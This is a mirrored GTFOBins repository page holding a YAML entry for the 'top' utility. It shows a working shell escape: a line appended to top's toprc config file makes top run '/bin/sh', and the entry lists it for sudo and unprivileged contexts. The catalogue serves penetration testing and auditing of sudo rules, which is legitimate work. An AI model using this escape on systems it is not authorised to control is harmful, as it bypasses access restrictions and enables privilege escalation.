mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-08 06:56:15 +01:00
15 lines
267 B
Plaintext
15 lines
267 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
echo -e 'pipe\tx\texec /bin/sh 1>&0 2>&0' >>~/.config/procps/toprc
|
|
top
|
|
# press return twice
|
|
reset
|
|
comment: |-
|
|
The config path might be different.
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
...
|